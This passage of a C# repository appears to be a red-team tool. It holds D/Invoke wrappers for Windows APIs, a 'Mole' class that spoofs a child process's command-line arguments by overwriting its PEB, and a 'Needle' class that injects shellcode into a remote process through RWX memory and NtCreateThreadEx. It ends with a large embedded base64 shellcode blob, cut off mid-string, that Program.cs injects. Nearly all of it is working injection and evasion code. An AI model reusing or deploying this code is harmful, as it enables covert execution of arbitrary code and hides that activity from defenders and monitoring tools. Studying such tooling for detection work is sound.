Data.Win32.PROCESS_INFORMATION(); 18 | 19 | object[] parameters = 20 | { 21 | applicationName, lpCommandLine, pa, ta, true, creationFlags, IntPtr.Zero, 22 | Directory.GetCurrentDirectory(), startupInfoEx, pi 23 | }; 24 | 25 | var result = (bool)Generic.DynamicAPIInvoke("kernel32.dll", "CreateProcessA", 26 | typeof(Delegates.CreateProcessA), ref parameters); 27 | 28 | if (!result) processInformation = pi; 29 | 30 | processInformation = (Data.Win32.PROCESS_INFORMATION)parameters[9]; 31 | return result; 32 | } 33 | 34 | public static bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, 35 | ref IntPtr lpSize) 36 | { 37 | object[] parameters = { lpAttributeList, dwAttributeCount, 0, lpSize }; 38 | 39 | var result = (bool)Generic.DynamicAPIInvoke("kernel32.dll", "InitializeProcThreadAttributeList", 40 | typeof(Delegates.InitializeProcThreadAttributeList), ref parameters); 41 | 42 | lpSize = (IntPtr)parameters[3]; 43 | return result; 44 | } 45 | 46 | public static bool UpdateProcThreadAttributeList(IntPtr lpAttributeList, IntPtr attribute, IntPtr lpValue) 47 | { 48 | object[] parameters = 49 | { 50 | lpAttributeList, (uint)0, attribute, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero 51 | }; 52 | 53 | var result = (bool)Generic.DynamicAPIInvoke("kernel32.dll", "UpdateProcThreadAttribute", 54 | typeof(Delegates.UpdateProcThreadAttribute), ref parameters); 55 | 56 | return result; 57 | } 58 | 59 | public static bool DeleteProcThreadAttributeList(IntPtr lpAttributeList) 60 | { 61 | object[] parameters = { lpAttributeList }; 62 | 63 | var result = (bool)Generic.DynamicAPIInvoke("kernel32.dll", "DeleteProcThreadAttributeList", 64 | typeof(Delegates.DeleteProcThreadAttributeList), ref parameters); 65 | 66 | return result; 67 | } 68 | 69 | public static uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds) 70 | { 71 | object[] parameters = { hHandle, dwMilliseconds }; 72 | 73 | return (uint)Generic.DynamicAPIInvoke("kernel32.dll", "WaitForSingleObject", 74 | typeof(Delegates.WaitForSingleObject), ref parameters); 75 | } 76 | 77 | public static bool CloseHandle(IntPtr handle) 78 | { 79 | object[] parameters = { handle }; 80 | 81 | return (bool)Generic.DynamicAPIInvoke("kernel32.dll", "CloseHandle", typeof(Delegates.CloseHandle), 82 | ref parameters); 83 | } 84 | 85 | public static bool DuplicateHandle(IntPtr hSourceProcessHandle, IntPtr hSourceHandle, 86 | IntPtr hTargetProcessHandle, ref IntPtr lpTargetHandle, uint dwDesiredAccess, bool bInheritHandle, 87 | Data.Win32.DuplicateOptions dwOptions) 88 | { 89 | object[] parameters = 90 | { 91 | hSourceProcessHandle, hSourceHandle, hTargetProcessHandle, lpTargetHandle, dwDesiredAccess, 92 | bInheritHandle, dwOptions 93 | }; 94 | 95 | var result = (bool)Generic.DynamicAPIInvoke("kernel32.dll", "DuplicateHandle", 96 | typeof(Delegates.DuplicateHandle), 97 | ref parameters); 98 | 99 | lpTargetHandle = (IntPtr)parameters[3]; 100 | return result; 101 | } 102 | 103 | public static bool CreatePipe(ref IntPtr hReadPipe, ref IntPtr hWritePipe, 104 | ref Data.Win32.SECURITY_ATTRIBUTES lpPipeAttributes, uint nSize) 105 | { 106 | object[] parameters = { hReadPipe, hWritePipe, lpPipeAttributes, nSize }; 107 | 108 | var result = (bool)Generic.DynamicAPIInvoke("kernel32.dll", "CreatePipe", typeof(Delegates.CreatePipe), 109 | ref parameters); 110 | 111 | hReadPipe = (IntPtr)parameters[0]; 112 | hWritePipe = (IntPtr)parameters[1]; 113 | 114 | return result; 115 | } 116 | 117 | public static bool PeekNamedPipe(IntPtr handle, IntPtr buffer, IntPtr nBufferSize, IntPtr bytesRead, ref uint bytesAvail, IntPtr BytesLeftThisMessage) 118 | { 119 | object[] parameters = { handle, buffer, nBufferSize, bytesRead, bytesAvail, BytesLeftThisMessage }; 120 | 121 | var result = (bool)Generic.DynamicAPIInvoke("kernel32.dll", "PeekNamedPipe", typeof(Delegates.PeekNamedPipe), 122 | ref parameters); 123 | 124 | bytesAvail = (uint)parameters[4]; 125 | return result; 126 | } 127 | 128 | public static bool SetHandleInformation(IntPtr hObject, Data.Win32.HandleFlags dwMask, 129 | Data.Win32.HandleFlags dwFlags) 130 | { 131 | object[] parameters = { hObject, dwMask, dwFlags }; 132 | 133 | return (bool)Generic.DynamicAPIInvoke("kernel32.dll", "SetHandleInformation", 134 | typeof(Delegates.SetHandleInformation), 135 | ref parameters); 136 | } 137 | } 138 | } -------------------------------------------------------------------------------- /DemoApp/Deception/Mole.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | using System.Text; 4 | using System.Threading; 5 | 6 | using DemoApp.DInvoke; 7 | 8 | namespace DemoApp.Deception 9 | { 10 | public class Mole 11 | { 12 | private readonly Data.Win32.PROCESS_INFORMATION _pi; 13 | private readonly string _realArgs; 14 | 15 | public Mole(Data.Win32.PROCESS_INFORMATION pi, string realArgs) 16 | { 17 | _pi = pi; 18 | _realArgs = realArgs; 19 | } 20 | 21 | public void SpoofArgs() 22 | { 23 | var pbi = Native.NtQueryInformationProcessBasicInformation(_pi.hProcess); 24 | 25 | // x64 only 26 | var rtlUserProcessParameters = 0x20; 27 | var commandLine = 0x70; 28 | var readSize = 0x8; 29 | 30 | Thread.Sleep(500); 31 | 32 | var pProcessParams = ReadRemoteMemory(pbi.PebBaseAddress + rtlUserProcessParameters, readSize); 33 | var processParams = Marshal.ReadInt64(pProcessParams); 34 | var cmdLineUnicodeStruct = new IntPtr(processParams + commandLine); 35 | 36 | var currentCmdLineStruct = new Data.Native.UNICODE_STRING(); 37 | var uniStructSize = Marshal.SizeOf(currentCmdLineStruct); 38 | 39 | var pCmdLineStruct = ReadRemoteMemory(cmdLineUnicodeStruct, uniStructSize); 40 | currentCmdLineStruct = (Data.Native.UNICODE_STRING)Marshal.PtrToStructure(pCmdLineStruct, typeof(Data.Native.UNICODE_STRING)); 41 | 42 | WriteRemoteMemory(currentCmdLineStruct.Buffer, currentCmdLineStruct.Length); 43 | 44 | Thread.Sleep(500); 45 | Native.NtResumeThread(_pi.hThread, IntPtr.Zero); 46 | 47 | Marshal.FreeHGlobal(pProcessParams); 48 | Marshal.FreeHGlobal(pCmdLineStruct); 49 | } 50 | 51 | private IntPtr ReadRemoteMemory(IntPtr pMem, int size) 52 | { 53 | // Alloc & null buffer 54 | var pMemLoc = Marshal.AllocHGlobal(size); 55 | Native.RtlZeroMemory(pMemLoc, size); 56 | 57 | // Read 58 | var bytesToRead = (uint)size; 59 | Native.NtReadVirtualMemory( 60 | _pi.hProcess, 61 | pMem, 62 | pMemLoc, 63 | ref bytesToRead); 64 | 65 | return pMemLoc; 66 | } 67 | 68 | private void WriteRemoteMemory(IntPtr pDest, int size) 69 | { 70 | // Make writable 71 | var regionSize = (IntPtr)size; 72 | var oldProtect = Native.NtProtectVirtualMemory( 73 | _pi.hProcess, 74 | ref pDest, 75 | ref regionSize, 76 | Data.Win32.PAGE_READWRITE); 77 | 78 | var pMem = Marshal.AllocHGlobal(size); 79 | 80 | // Erase current buffer 81 | Native.RtlZeroMemory(pMem, size); 82 | 83 | _ = Native.NtWriteVirtualMemory( 84 | _pi.hProcess, 85 | pDest, 86 | pMem, 87 | (uint)size); 88 | 89 | // Write new args 90 | if (!string.IsNullOrEmpty(_realArgs)) 91 | { 92 | var newArgs = Encoding.Unicode.GetBytes(_realArgs); 93 | Marshal.Copy(newArgs, 0, pMem, newArgs.Length); 94 | 95 | _ = Native.NtWriteVirtualMemory( 96 | _pi.hProcess, 97 | pDest, 98 | pMem, 99 | (uint)size); 100 | } 101 | 102 | // Restore memory perms 103 | _ = Native.NtProtectVirtualMemory( 104 | _pi.hProcess, 105 | ref pDest, 106 | ref regionSize, 107 | oldProtect); 108 | 109 | Marshal.FreeHGlobal(pMem); 110 | } 111 | } 112 | } -------------------------------------------------------------------------------- /DemoApp/DemoApp.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {0B537331-512A-4475-A15E-59D12EC4BCC7} 8 | Exe 9 | DemoApp 10 | DemoApp 11 | v4.8 12 | 512 13 | true 14 | 15 | latestmajor 16 | 17 | 18 | AnyCPU 19 | true 20 | full 21 | false 22 | bin\Debug\ 23 | DEBUG;TRACE 24 | prompt 25 | 4 26 | false 27 | false 28 | 29 | 30 | AnyCPU 31 | pdbonly 32 | true 33 | bin\Release\ 34 | TRACE 35 | prompt 36 | 4 37 | false 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | -------------------------------------------------------------------------------- /DemoApp/Injection/Needle.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | using DemoApp.DInvoke; 5 | 6 | namespace DemoApp.Injection 7 | { 8 | public class Needle 9 | { 10 | private readonly Data.Win32.PROCESS_INFORMATION _pi; 11 | 12 | public Needle(Data.Win32.PROCESS_INFORMATION pi) 13 | { 14 | _pi = pi; 15 | } 16 | 17 | public void Inject(byte[] shellcode) 18 | { 19 | var shellcodeBuf = Marshal.AllocHGlobal(shellcode.Length); 20 | Marshal.Copy(shellcode, 0, shellcodeBuf, shellcode.Length); 21 | 22 | var size = (IntPtr)shellcode.Length; 23 | var memory = IntPtr.Zero; 24 | 25 | Native.NtAllocateVirtualMemory( 26 | _pi.hProcess, 27 | ref memory, 28 | IntPtr.Zero, 29 | ref size, 30 | Data.Win32.MEM_COMMIT | Data.Win32.MEM_RESERVE, 31 | Data.Win32.PAGE_EXECUTE_READWRITE); 32 | 33 | Native.NtWriteVirtualMemory( 34 | _pi.hProcess, 35 | memory, 36 | shellcodeBuf, 37 | (uint)shellcode.Length); 38 | 39 | var hThread = IntPtr.Zero; 40 | Native.NtCreateThreadEx( 41 | ref hThread, 42 | Data.Win32.ACCESS_MASK.GENERIC_ALL, 43 | IntPtr.Zero, 44 | _pi.hProcess, 45 | memory, 46 | IntPtr.Zero, 47 | false, 48 | 0, 49 | 0, 50 | 0, 51 | IntPtr.Zero); 52 | 53 | Marshal.FreeHGlobal(shellcodeBuf); 54 | } 55 | } 56 | } -------------------------------------------------------------------------------- /DemoApp/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | 3 | namespace DemoApp 4 | { 5 | internal static class Program 6 | { 7 | private static void Main(string[] args) 8 | { 9 | if (!int.TryParse(args[0], out var ppid)) 10 | { 11 | Console.WriteLine("Usage: DemoApp.exe "); 12 | return; 13 | } 14 | 15 | var shellcode = Convert.FromBase64String("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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwFwAAAAAAAAIAAAAAAAAAAQAAAHY0LjAuMzAzMTkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIAAE1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAEwBAwCAjhf/AAAAAAAAAADgACIACwEwAAAIAAAACAAAAAAAAEInAAAAIAAAAEAAAAAAQAAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAgAAAAAIAAAAAAAADAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAADvJgAATwAAAABAAADMBQAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAUCYAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAAEgHAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAADMBQAAAEAAAAAGAAAACgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAABgAAAAAgAAABAAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAIycAAAAAAABIAAAAAgAFAGggAADoBQAAAQAAAAEAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AHIBAABwKA8AAAoAKiICKBAAAAoAKgBCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAADMAQAAI34AADgCAABcAgAAI1N0cmluZ3MAAAAAlAQAADQAAAAjVVMAyAQAABAAAAAjR1VJRAAAANgEAAAQAQAAI0Jsb2IAAAAAAAAAAgAAAUcVAAAJAAAAAPoBMwAWAAABAAAAEQAAAAIAAAACAAAAAQAAABAAAAAOAAAAAQAAAAEAAAAAAIoBAQAAAAAABgD/ABMCBgBsARMCBgAzAOEBDwAzAgAABgBbAMkBBgDiAMkBBgDDAMkBBgBTAckBBgAfAckBBgA4AckBBgByAMkBBgBHAPQBBgAlAPQBBgCmAMkBBgCNAJsBBgBHAr0BBgATAL0BAAAAAAEAAAAAAAEAAQAAABAAtQFOAkEAAQABAFAgAAAAAJEAxAEoAAEAXiAAAAAAhhjbAQYAAgAAAAEAQgIJANsBAQARANsBBgAZANsBCgApANsBEAAxANsBEAA5ANsBEABBANsBEABJANsBEABRANsBEABZANsBEABhANsBFQBpANsBEABxANsBEAB5ANsBEACJABsAGgCBANsBBgAuAAsALgAuABMANwAuABsAVgAuACMAXwAuACsAcQAuADMAcQAuADsAcQAuAEMAXwAuAEsAdwAuAFMAcQAuAFsAcQAuAGMAjwAuAGsAuQAuAHMAxgAEgAAAAQAAAAAAAAAAAAAAAABOAgAABAAAAAAAAAAAAAAAHwAKAAAAAAAAAAAAADxNb2R1bGU+AG1zY29ybGliAENvbnNvbGUAV3JpdGVMaW5lAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAERlbW9Bc3NlbWJseS5leGUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBQcm9ncmFtAFN5c3RlbQBNYWluAFN5c3RlbS5SZWZsZWN0aW9uAC5jdG9yAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJT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